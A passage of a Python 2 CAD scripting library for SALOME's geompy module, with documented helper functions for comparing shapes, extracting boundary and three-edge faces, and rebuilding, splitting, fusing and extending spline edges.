shapes = GetGUISelection(shapes)
shapes = GetObject(shapes)
#-
# Check the input shape existence
if "error" in shapes or None in shapes: return
#-
# Check the number of selected objects
if len(shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
is_equal = False
# Check the centers of mass
centers_of_mass = [
geompy.MakeCDG(shapes[0]),
geompy.MakeCDG(shapes[1])
]
distance = geompy.MinDistance(centers_of_mass[1], centers_of_mass[0])
#-
if distance <= tol:# If they are equals...
# Check the basic properties
basic_properties = [
geompy.BasicProperties(shapes[0]),
geompy.BasicProperties(shapes[1])
]
for i in range(len(basic_properties[0])):
difference = abs(basic_properties[1][i] - basic_properties[0][i])
if difference > tol:
break
#-
if i == len(basic_properties[0]) - 1:# If they are equal...
# Check the inertia matrices
inertia_matrices = [
geompy.Inertia(shapes[0]),
geompy.Inertia(shapes[1])
]
for i in range(len(inertia_matrices[0])):
difference = abs(inertia_matrices[1][i] - inertia_matrices[0][i])
if difference > tol:
break
#-
if i == len(inertia_matrices[0]) - 1:# If they are equal...
# Say the shapes are equal
is_equal = True
#-
# Return the result
return is_equal
#-
ge = GeometricalEquality
def GetBoundaryFaces( compound = None, single = True, add = True, infa = True ):
	"""
	Description:
		Get the boundary faces of a solid compound and put them in a group.
	Arguments:
		# compound
			Description: The input compound of solids.
			Type: Compound of Solids
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# single
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# infa
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
	Returned Values:
		"dim" value: -
		"single" value: False
			Type: Face
			Number: n
			Name: "BoundaryFace"
		"dim" value: -
		"single" value: True
			Type: Compound or Group of Faces
			Number: 1
			Name: "BoundaryFaces"
	Conditions of use:
		-
	"""
	# Get the input shape(s)
	compound = GetGUISelection(compound)
	compound = GetObject(compound)
	#-
	# Make this function recursive
	if isinstance(compound, list):
		return_list = []
		for sub_object in compound:
			return_list.append(GetBoundaryFaces(sub_object, single, add, infa))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [compound] or None in [compound]: return
	#-
	# Set father object
	father = None
	if infa == True: father = compound
	#-
	if False: pass
	else:# All checks done
		# Get the sub-shapes ("compound" becomes the GetSubShapes structure:
		# index 2 holds the faces, index -1 the main shape itself)
		compound = GetSubShapes(compound)
		#-
		# Get the boundary face IDs (the faces not shared by two solids)
		boundary_face_ids = geompy.GetFreeFacesIDs(compound[-1])
		#-
		# Create the boundary face group
		boundary_face_group = geompy.CreateGroup(compound[-1], geompy.ShapeType["FACE"])
		#-
		boundary_face_list = []
		for face in compound[2]:# For each face of the compound...
			# Get the face ID
			face_id = geompy.GetSubShapeID(compound[-1], face)
			#-
			# Put the face in the group
			if face_id in boundary_face_ids:
				geompy.AddObject(boundary_face_group, face_id)
				boundary_face_list.append(face)
			#-
		to_return = boundary_face_list
		to_return_name = "BoundaryFace"
		if single == True:
			to_return_name = "BoundaryFaces"
			if infa == True:
				to_return = boundary_face_group
			else:
				compound = geompy.MakeCompound(boundary_face_list)
				to_return = compound
		# Add and return the resulting shape(s)
		if add == True:
			# A single returned shape is added with suffix and refresh; a
			# list is added silently and the browser refreshed once at the end
			slow_add = False
			if not isinstance(to_return, list) or single == True: slow_add = True
			AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
			if slow_add == False:
				if salome.sg.hasDesktop():
					salome.sg.updateObjBrowser(1)
		return to_return
		#-
gbf = GetBoundaryFaces
def GetTriEdgeFaces( shape = None, tol = 1e-7, add = True ):
	"""
	Description:
		Get all the surfaces having three edges and put them in separated groups.
	Arguments:
		# shape
			Description: The shape in which to look for tri-edge faces.
			Type: Any geometrical object
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# tol
			Description: See here.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1e-7
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
	Returned Values:
		"dim" value: -
		"single" value: -
			Type: Group of Faces
			Number: n
			Name: "TriEdgeFace"
	Conditions of use:
		-
	"""
	# Get the input shape(s)
	shape = GetGUISelection(shape)
	shape = GetObject(shape)
	#-
	# Make this function recursive
	if isinstance(shape, list):
		return [GetTriEdgeFaces(sub_shape, tol, add) for sub_shape in shape]
	#-
	# Check the input shape existence
	if "error" in [shape] or None in [shape]: return
	#-
	# All checks done
	# Get the sub-shapes (index 2 holds the faces, index -1 the main shape)
	shape = GetSubShapes(shape)
	main_shape = shape[-1]
	# Keep only the faces made of exactly three edges, as reported by
	# the geompy.WhatIs() description (NOTE: "tol" is currently unused)
	triangle_faces = [
		candidate_face for candidate_face in shape[2]
		if "EDGE : 3" in geompy.WhatIs(candidate_face)
	]
	# Wrap each tri-edge face into its own single-face group
	triangle_groups = []
	for triangle_face in triangle_faces:
		triangle_group = geompy.CreateGroup(main_shape, geompy.ShapeType["FACE"])
		triangle_face_id = geompy.GetSubShapeID(main_shape, triangle_face)
		geompy.AddObject(triangle_group, triangle_face_id)
		triangle_groups.append(triangle_group)
	# Add and return the resulting shape(s)
	if add == True:
		for triangle_group in triangle_groups:
			AddToStudy(triangle_group, "TriEdgeFace", father = main_shape)
	return triangle_groups
gtef = GetTriEdgeFaces
def RebuildSpline( np = 20, edge = None, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Rebuilds an edge with a spline.
Arguments:
# np
Description: See here. In addition, the value of this argument can be a list of parameters (from 0.0 to 1.0) which will be used to create the internal list of vertexes.
Type: Integer or List of Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# edge
Description: The edge to rebuild.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "RebuiltSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "RebuiltSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "RebuiltSpline"
Conditions of use:
-
"""
#if isinstance(np, str): print "[X] The first argument (np) should be an integer."; return
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge = GetGUISelection(edge)
edge = GetObject(edge)
#-
# Make this function recursive
if isinstance(edge, list):
return_list = []
for sub_object in edge:
return_list.append(RebuildSpline(np, sub_object, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [edge] or None in [edge]: return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the list of positions where to create vertexes
if isinstance(np, list):
parameter_list = np
else:
parameter_list = [float(i) / (np - 1) for i in range(np)]
#-
# Create the points
points = []
for parameter in parameter_list:
points.append(geompy.MakeVertexOnCurve(edge, parameter))
#-
if dim == 0:# If the output dimension is 0...
to_return = points
to_return_name = "RebuiltSpline (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "RebuiltSpline (Vertexes)"
else:
# Create the edge
rebuilt_spline = geompy.MakeInterpol(points)
#-
to_return = rebuilt_spline
to_return_name = "RebuiltSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
rs = RebuildSpline
def SplitEdge( np = 20, edge = None, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Splits an edge into a discretized wire.
Arguments:
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# edge
Description: The edge to split.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "SplitEdge (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "SplitEdge (Vertexes)"
"dim" value: 1
"single" value: -
Type: Wire
Number: 1
Name: "SplitEdge"
Conditions of use:
-
"""
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge = GetGUISelection(edge)
edge = GetObject(edge)
#-
# Make this function recursive
if isinstance(edge, list):
return_list = []
for sub_object in edge:
return_list.append(SplitEdge(np, sub_object, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [edge] or None in [edge]: return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the list of positions where to create vertexes
if isinstance(np, list):
parameter_list = np
else:
parameter_list = [float(i) / (np - 1) for i in range(np)]
#-
# Create the points
points = []
for parameter in parameter_list:
points.append(geompy.MakeVertexOnCurve(edge, parameter))
#-
if dim == 0:# If the output dimension is 0...
to_return = points
to_return_name = "SplitEdge (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "SplitEdge (Vertexes)"
else:
# Partition the edge
partition = geompy.MakePartition([edge], points)
#-
# Explode the partition in edges
edges = geompy.SubShapeAll(partition, geompy.ShapeType["EDGE"])
#-
# Create the wire
wire = geompy.MakeWire(edges)
#-
to_return = wire
to_return_name = "SplitEdge"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
se = SplitEdge
def DiscretizeEdgeByCurvature( edge = None, np = 20, fine = 1e3, it_max = 10, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Discretizes an edge into a wire made of straight edges taking into account the local curvature.
Arguments:
# edge
Description: The edge to discretize.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# np
Description: See here. In this case, corresponds to the number of vertexes used for the first iteration.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# fine
Description: The desired fineness. Higher it is, finer is the discretization.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e3
# it_max
Description: The maximum number of iterations.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "EdgeDiscretizedByCurvature (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "EdgeDiscretizedByCurvature (Vertexes)"
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "EdgeDiscretizedByCurvature (Edge)"
"dim" value: 1
"single" value: True
Type: Wire
Number: 1
Name: "EdgeDiscretizedByCurvature"
Conditions of use:
-
"""
input_shape = edge
# Check the "dim" value
if dim not in [ - 1, 0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
#-
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(DiscretizeEdgeByCurvature(sub_object, np, fine, it_max, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Check the input shape type
if geompy.NumberOfEdges(input_shape) != 1:
print "[X] The first argument (edge) should be a single edge."; return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
edge = input_shape
if False: pass
else:# All checks done
if np < 2:
np = 2
# Get the edge length
edge_length = geompy.BasicProperties(edge)[0]
#-
# Deduce the max distance above which to refine
dist = edge_length / fine
#-
# Create a first set of equidistqnt vertexes
parameter_list = [n / float(np - 1) for n in range(np)]
vertex_list = [geompy.MakeVertexOnCurve(edge, parameter) for parameter in parameter_list]
#-
for j in range(it_max):# For each iteration...
# Get segments to refine
nb_vertexes = len(vertex_list)
segment_to_refine_index_list = []
for i in range(nb_vertexes - 2):
p0 = parameter_list[i]
p1 = parameter_list[i + 1]
p2 = parameter_list[i + 2]
v0 = vertex_list[i]
v1 = vertex_list[i + 1]
v2 = vertex_list[i + 2]
straight_edge = geompy.MakeEdge(v0, v2)
distance = geompy.MinDistance(v1, straight_edge)
if distance > dist:
segment_to_refine_index_list.extend([i, i + 1])
segment_to_refine_index_list = list(set(segment_to_refine_index_list))
segment_to_refine_index_list.sort()
#-
if len(segment_to_refine_index_list) == 0:
break
# Refine segments
new_parameter_list = list(parameter_list)
new_vertex_list = list(vertex_list)
for segment_to_refine_index in reversed(segment_to_refine_index_list):
index = segment_to_refine_index
p0 = parameter_list[index]
p1 = parameter_list[index + 1]
p01 = (p0 + p1) / 2.0
new_parameter_list.insert(index + 1, p01)
v01 = geompy.MakeVertexOnCurve(edge, p01)
new_vertex_list.insert(index + 1, v01)
parameter_list = list(new_parameter_list)
vertex_list = list(new_vertex_list)
#-
if dim == -1:
# Add and return the resulting shape(s)
to_return = parameter_list
return to_return
#-
elif dim == 0:
to_return = vertex_list
to_return_name = "EdgeDiscretizedByCurvature (Vertex)"
if single == True:
compound = geompy.MakeCompound(vertex_list)
to_return = compound
to_return_name = "EdgeDiscretizedByCurvature (Vertexes)"
else:
# Create a polyline from vertexes
nb_vertexes = len(vertex_list)
segment_list = []
for i in range(nb_vertexes - 1):
v1 = vertex_list[i]
v2 = vertex_list[i + 1]
segment = geompy.MakeEdge(v1, v2)
segment_list.append(segment)
#-
to_return = segment_list
to_return_name = "EdgeDiscretizedByCurvature (Edge)"
if single == True:
wire = geompy.MakeWire(segment_list)
to_return = wire
to_return_name = "EdgeDiscretizedByCurvature"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
debc = DiscretizeEdgeByCurvature
def FuseSplines( edges = [None], np = 20, curv = True, tol = 1e-7, single = True, add = True, dim = 1 ):
"""
Description:
Fuses two edges.
Arguments:
# edges
Description: The edges to fuse.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# np
Description: See here. In this case, the number of points is divided up between input edges according to their lenght.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "FusedSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "FusedSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "FusedSpline"
Conditions of use:
For better results, if coincident, both splines has to be as tangential as possible.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edges = GetGUISelection(edges)
edges = GetObject(edges)
#-
# Check the input shape existence
if "error" in edges or None in edges: return
#-
# Check the number of selected objects
if len(edges) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the number of points on each edge
length_1 = geompy.BasicProperties(edges[0])[0]
length_2 = geompy.BasicProperties(edges[1])[0]
total_lenght = length_1 + length_2
np_1 = int(round(float(np) * length_1 / total_lenght))
np_2 = int(round(float(np) * length_2 / total_lenght))
#-
# Extract the edge vertexes
#### Here the extremum vertexes are created on curve
#### and not exploded to be sure the vertex order
#### respects the edge orientation
edge_vertexes = [
geompy.MakeVertexOnCurve(edges[0], 0),
geompy.MakeVertexOnCurve(edges[0], 1),
geompy.MakeVertexOnCurve(edges[1], 0),
geompy.MakeVertexOnCurve(edges[1], 1)
]
#### -
#-
# Determine the edge directions
min_distances = [
geompy.MinDistance(edge_vertexes[0], edges[1]),
geompy.MinDistance(edge_vertexes[1], edges[1]),
geompy.MinDistance(edges[0], edge_vertexes[2]),
geompy.MinDistance(edges[0], edge_vertexes[3])
]
reverse_edges = [False, False]
if min_distances[0] < min_distances[1]:
reverse_edges[0] = True
if min_distances[2] > min_distances[3]:
reverse_edges[1] = True
#-
# Check if splines are touching each other
edges_are_coincident = False
if min(min_distances) <= tol:
edges_are_coincident = True
#-
# Split edge_1
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(edges[0], np_1, dim = -1)
else:
parameter_list = [n / float(np_1) for n in range(np_1 + 1)]
if edges_are_coincident:
del parameter_list[-1]
fused_spline_vertexes = []
for parameter in parameter_list:
if reverse_edges[0] == True:
parameter = 1 - parameter
edge_1_vertex = geompy.MakeVertexOnCurve(edges[0], parameter)
fused_spline_vertexes.append(edge_1_vertex)
#-
# Split edge_2
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(edges[1], np_2, dim = -1)
else:
parameter_list = [n / float(np_2) for n in range(np_2 + 1)]
for parameter in parameter_list:
if reverse_edges[1] == True:
parameter = 1 - parameter
edge_2_vertex = geompy.MakeVertexOnCurve(edges[1], parameter)
fused_spline_vertexes.append(edge_2_vertex)
#-
if dim == 0:# If the output dimension is 0...
to_return = fused_spline_vertexes
to_return_name = "FusedSpline (Vertex)"
if single == True:
compound = geompy.MakeCompound(fused_spline_vertexes)
to_return = compound
to_return_name = "FusedSpline (Vertexes)"
else:
# Create the fused edge
fused_spline = geompy.MakeInterpol(fused_spline_vertexes, False, False)
#-
to_return = fused_spline
to_return_name = "FusedSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
fs = FuseSplines
def ExtendSpline( edge_and_vertex = [None], np = 20, pos = "auto", strat = "flex", curv = True, tol = 1e-7, single = True, add = True, infa = False, dim = 1 ):
    """
    Description:
        Extends an edge to a vertex position.
    Arguments:
        # edge_and_vertex
            Description: The edge to extend and the target vertex.
            Type: List of 1 Edge + 1 Vertex
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: None
        # np
            Description: See here. In this case, correspond to the number of vertexes created on the input edge.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 20
        # pos
            Description: If equals "before" or "after", the edge is extended from it start or its end respectively (according to its orientation). If equals "auto", the function decides itself.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "auto"
        # strat
            Description: Defines the extension strategy. If equals "rigid" or "flex", the edge is respectively extended with or without a constrain on the straightness of the extension.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "flex"
        # curv
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # tol
            Description: See here. Coincidence tolerance between the target vertex and the edge extremities.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # single
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
    Returned Values:
        "dim" value: 0
        "single" value: False
        Type: Vertex
        Number: n
        Name: "ExtendSpline (Vertex)"
        "dim" value: 0
        "single" value: True
        Type: Compound of Vertexes
        Number: 1
        Name: "ExtendSpline (Vertexes)"
        "dim" value: 1
        "single" value: -
        Type: Edge
        Number: 1
        Name: "ExtendSpline"
    Conditions of use:
        -
    """
    if isinstance(edge_and_vertex, list) == False: print "[X] The first argument (edge_and_vertex) should be an array."; return
    if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    edge_and_vertex = GetGUISelection(edge_and_vertex)
    edge_and_vertex = GetObject(edge_and_vertex)
    #-
    # Check the input shape existence
    if "error" in edge_and_vertex or None in edge_and_vertex: return
    #-
    # Check the number of selected objects
    if len(edge_and_vertex) != 2:
        print "[X] Two shapes should be selected."
        return
    #-
    # Distinguish input shapes by their vertex count (1 vertex = vertex, 2 = edge)
    edge = None
    vertex = None
    for object in edge_and_vertex:
        nb_vertexes = len(geompy.SubShapeAll(object, geompy.ShapeType["VERTEX"]))
        if nb_vertexes == 1: vertex = object
        if nb_vertexes == 2: edge = object
    if None in [edge, vertex]:
        print "[X] Only an edge and a vertex should be selected."
        return
    #-
    # Set father object
    # NOTE(review): father is assigned here but not passed to AddToStudy
    # below, so "infa" currently has no visible effect — confirm intent.
    father = None
    if infa == True: father = edge
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes (index 0: vertexes, index -1: the shape itself —
        # presumably the convention of GetSubShapes; TODO confirm)
        [edge, vertex] = GetSubShapes([edge, vertex])
        #-
        # Check if the edge and vertex are not coincident
        vertex_is_coincident = False
        for edge_vertex in edge[0]:
            distance = geompy.MinDistance(edge_vertex, vertex[-1])
            if distance <= tol:
                vertex_is_coincident = True
        #-
        # Check the position (fall back to "auto" on any unknown value)
        if pos not in ["auto", "before", "after"]:
            pos = "auto"
        #-
        # Get the pos of the user vertex: extend from whichever extremity is
        # closer to the target vertex
        if pos == "auto":
            vertex_distances = [
                geompy.MinDistance(vertex[-1], edge[0][0]),
                geompy.MinDistance(vertex[-1], edge[0][1])
            ]
            pos = "after"
            if vertex_distances[0] < vertex_distances[1]:
                pos = "before"
        #-
        # Create the spline vertexes (discretization of the input edge)
        if curv == True:
            np_or_params = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
        else:
            np_or_params = np
        spline_vertexes = RebuildSpline(np_or_params, edge[-1], dim = 0, single = False, add = False)
        if not vertex_is_coincident:
            if strat == "rigid":
                # Rigid strategy: append a straight segment, then re-fuse
                if pos == "before":
                    extension = geompy.MakeEdge(vertex[-1], edge[0][0])
                if pos == "after":
                    extension = geompy.MakeEdge(edge[0][1], vertex[-1])
                spline_vertexes = FuseSplines([edge[-1], extension], np = np, dim = 0, add = False)
                spline_vertexes = geompy.SubShapeAll(spline_vertexes, geompy.ShapeType["VERTEX"])
            else:# strat = "flex"
                # Flex strategy: simply add the target vertex to the
                # interpolation points, letting the spline bend freely
                if pos == "before":
                    spline_vertexes.insert(0, vertex[-1])
                    #for parameter in [n / float(np) for n in range(np + 1)]:
                        #splineVertex = geompy.MakeVertexOnCurve(edge[-1], parameter)
                        #splineVertexes.append(spline_vertex)
                if pos == "after":
                    spline_vertexes.append(vertex[-1])
        #-
        if dim == 0:# If the output dimension is 0...
            to_return = spline_vertexes
            to_return_name = "ExtendSpline (Vertex)"
            if single == True:
                # Create the vertex compound
                spline_vertex_compound = geompy.MakeCompound(spline_vertexes)
                #-
                to_return = spline_vertex_compound
                to_return_name = "ExtendSpline (Vertexes)"
        else:
            # Create the extended spline
            extended_spline = geompy.MakeInterpol(spline_vertexes, False, False)
            #-
            to_return = extended_spline
            to_return_name = "ExtendSpline"
        # Add and return the resulting shape(s)
        if add == True:
            slow_add = False
            if not isinstance(to_return, list) or single == True: slow_add = True
            AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
            if slow_add == False:
                if salome.sg.hasDesktop():
                    salome.sg.updateObjBrowser(1)
        return to_return
        #-
es = ExtendSpline
def ExtendSplinesToIntersection( edges = [None], np = 20, curv = True, tol = 1e-4, single = True, add = True ):
"""
Description:
Extends two splines to intersection points.
Arguments:
# edges
Description: The edges to extend.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-4
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: False
Type: Edge
Number: 2
Name: "SplineExtendedToIntersection"
"dim" value: -
"single" value: True
Type: Wire or Compound of Edges
Number: 1
Name: "SplinesExtendedToIntersection"
Conditions of use:
To detect intersection, both input splines must be as coplanar as possible.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
input_shapes = edges
# Get the input shape(s)
input_shapes = GetGUISelection(input_shapes)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
# Check the number of selected objects
if len(input_shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
edges = input_shapes
if False: pass
else:# All checks done
small_value = 1e-3
length_1 = geompy.BasicProperties(edges[0])[0]
length_2 = geompy.BasicProperties(edges[1])[0]
infinite_distance = (length_1 + length_2) * 1e2
# Create boundary direction vectors
direction_vectors = []
boundary_vertexes = []
for i in range(2):
edge = edges[i]
v11 = geompy.MakeVertexOnCurve(edge, 0.0 + small_value)
v12 = geompy.MakeVertexOnCurve(edge, 0.0)
v21 = geompy.MakeVertexOnCurve(edge, 1.0 - small_value)
v22 = geompy.MakeVertexOnCurve(edge, 1.0)
boundary_vertexes.append([v12, v22])
direction_vector_1 = geompy.MakeVector(v11, v12)
direction_vector_2 = geompy.MakeVector(v21, v22)
direction_vectors.append([direction_vector_1, direction_vector_2])
#-
# Extend edges
for i in range(2):# For each extremity of the first edge...
direction_vector_1 = direction_vectors[0][i]
vertex_1 = boundary_vertexes[0][i]
extrusion_1 = geompy.MakePrismVecH(vertex_1, direction_vector_1, infinite_distance)
# Get possible intersections with the second edge
possible_intersections = []
for j in range(2):
direction_vector_2 = direction_vectors[1][j]
vertex_2 = boundary_vertexes[1][j]
extrusion_2 = geompy.MakePrismVecH(vertex_2, direction_vector_2, infinite_distance)
distance = geompy.MinDistance(extrusion_1, extrusion_2)
if distance < tol:
[x, y, z] = geompy.ClosestPoints(extrusion_1, extrusion_2)[1][0:3]
intersection = geompy.MakeVertex(x, y, z)
possible_intersections.append(intersection)
#-
# Keep the closest intersection
final_intersection = None
nb_possible_intersections = len(possible_intersections)
if nb_possible_intersections > 1:
closest_intersection = None
min_distance = infinite_distance
for possible_intersection in possible_intersections:
distance = geompy.MinDistance(vertex_1, possible_intersection)
if distance < min_distance:
closest_intersection = possible_intersection
min_distance = distance
final_intersection = closest_intersection
elif nb_possible_intersections == 1:
final_intersection = possible_intersections[0]
#-
# Extend edges
if final_intersection != None:
for j in range(2):
edges[j] = ExtendSpline([edges[j], final_intersection], strat = "rigid", np = np, curv = curv, tol = tol, add = False)
#-
#-
to_return = edges
to_return_name = "SplineExtendedToIntersection"
if single == True:
try:
wire = geompy.MakeWire(to_return)
except:
wire = geompy.MakeCompound(to_return)
to_return = wire
to_return_name = "SplinesExtendedToIntersection"
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name)
return edges
#-
esti = ExtendSplinesToIntersection
def FuseSplineSets( compounds = [None], np = 20, curv = True, tol = 1e-7, add = True ):
"""
Description:
Fuses two sets of splines.
Arguments:
# compounds
Description: The spline sets to fuse.
Type: List of 2 Compounds of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "FusedSplineSets"
Conditions of use:
